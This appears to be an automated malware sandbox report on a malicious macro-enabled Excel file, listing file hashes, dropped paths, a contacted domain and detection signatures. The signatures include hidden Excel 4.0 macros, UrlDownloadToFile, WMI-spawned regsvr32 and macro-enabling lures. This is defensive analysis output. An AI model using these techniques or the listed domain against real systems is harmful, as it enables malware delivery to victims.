31.0.0 Emerald
IR
382991
CloudBasic
02:09:00
07/04/2021
Documents (252).xlsm
defaultwindowsofficecookbook.jbs
Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
WINDOWS
966c13f10fa0b3bfe75da87bca817396
1769db2ec1d019b526e63637a413ceab10d00ff3
963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14
Excel Microsoft Office Open XML Format document (40004/1) 83.32%
true
false
false
false
96
0
100
5
0
5
false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\842F6688.png
false
600F503BC1066BEB5FB5DD494AA1CD74
A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C8A64E9.png
false
29A9EE6FB5591751FC60ECD0FDB9478D
D8A58D27A5D77416E1B882FDE001FE827EB0C1F5
F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ABD84DE3.png
false
55E8A29B221E51BE421B7D4F5F5F7E52
117E73181FC9CDAA0904C6372D68EE48CEDC14E4
B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C16FFF7C.png
false
29A9EE6FB5591751FC60ECD0FDB9478D
D8A58D27A5D77416E1B882FDE001FE827EB0C1F5
F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0A1E1A7.png
false
600F503BC1066BEB5FB5DD494AA1CD74
A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F763B4BE.png
false
55E8A29B221E51BE421B7D4F5F5F7E52
117E73181FC9CDAA0904C6372D68EE48CEDC14E4
B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
C:\Users\user\AppData\Local\Temp\D2CE0000
false
BD358272AF7DAB33151195FF12D6217E
CCC193B27AA91319B42770E4B668FAF7A7929DB6
08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
false
835340709C9BFF9A87235BAEB59683B1
0754C627E8564659FE9FB5373FDC2F130EE5CB5E
0368C23B6D83D9BCEC16378A4E104A8CC2AFD0DA0CF5CFC78751943FC89C133D
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents (252).LNK
false
B2ACE93FE976A321BFC3FD8E59A2B6A6
93F2EB6AC0E1675C80834266AEB0FE694415CB66
22FEDE4E594CE2465437BAA9E7604556671CE3F8C4AC95C1B9272072A9543952
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
false
EBF0A100F3CDA68735AABF46F42CEFEF
48CA8B0E2DD6FE5737EFA9DAA2F9BB055B72F9E0
F86272101EB9CA0D4BB98DE814ADAAB3FF2891930B18A20BDDD8CDE3B55AF55B
C:\Users\user\Desktop\A3CE0000
false
BD358272AF7DAB33151195FF12D6217E
CCC193B27AA91319B42770E4B668FAF7A7929DB6
08463109BCBBC2A7F8683207172DA2DE3A8473E8D4CBE39AB1744CE83D8E6012
C:\Users\user\Desktop\~$Documents (252).xlsm
true
98D7F9B901C91608CD7EA5509662BBCA
F166635CE572B615A1D80076A1AE8DE9220473CF
F07A8B18E5B50003C42020241E82DDCCFBE254236AF2678C3CEFA4709100F4FE
192.168.2.255
xherzog24pv.xyz
true
unknown
Contains functionality to create processes via WMI
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office document connecting to suspicious TLD
Outdated Microsoft Office dropper detected
Performs DNS queries to domains with low reputation
Potential document exploit detected (performs DNS queries with low reputation score)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Wmic Launch regsvr32